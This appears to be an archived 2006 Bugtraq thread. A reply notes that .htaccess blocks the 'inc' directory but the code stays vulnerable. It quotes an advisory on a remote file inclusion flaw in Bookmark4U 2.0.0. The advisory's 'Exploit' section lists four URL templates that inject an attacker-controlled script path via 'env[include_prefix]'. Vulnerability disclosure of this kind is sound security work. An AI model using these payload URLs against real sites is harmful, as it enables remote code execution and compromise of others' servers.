Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Bookmark4U Remote File Include

From: str0ke <str0ke () milw0rm com>
Date: Mon, 5 Jun 2006 12:17:10 -0500
The inc directory is filtered with .htaccess (Deny from all).  Still
vulnerable code though :)

/str0ke

On 4 Jun 2006 14:39:27 -0000, selfar2002 () hotmail com
<selfar2002 () hotmail com> wrote:


---------------------------------------------------------------------------

Bookmark4U <= 2.0.0? ([include_prefix]) Remote File Include Vulnerabilities

---------------------------------------------------------------------------

Discovered By SnIpEr_SA

Author    : SnIpEr_SA

Remote  :  Yes

Local     :  No

Critical Level : Dangerous

---------------------------------------------------------------------------


Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application : Bookmark4U

version     : 2.0.0

URL         :http://bookmark4u.sourceforge.net/

...

------------------------------------------------------------------

Exploit:

~~~~~~~~

# http://www.site.com/[Bookmark4Upath]/inc/dbase.php?env[include_prefix]=[evil_scripts]

# http://www.site.com/[Bookmark4Upath]/inc/config.php?env[include_prefix]=[evil_scripts]

# http://www.site.com/[Bookmark4Upath]/inc/common.php?env[include_prefix]=[evil_scripts]

# http://www.site.com/[Bookmark4Upath]/inc/function.php?env[include_prefix]=[evil_scripts]


---------------------------------------------------------------------------

*/

Contact:

 ~~~~~~~~

 SnIpEr_SA

E-mail: selfar2002 () hotmail com

E-mail: SnIpEr.SA[at]hotMail[dot]com

Homepage: http://www.3asfh.net/  & http://www.lezr.com/

Greetz: All My Frind

/*

-------------------------------- [ END ] ----------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: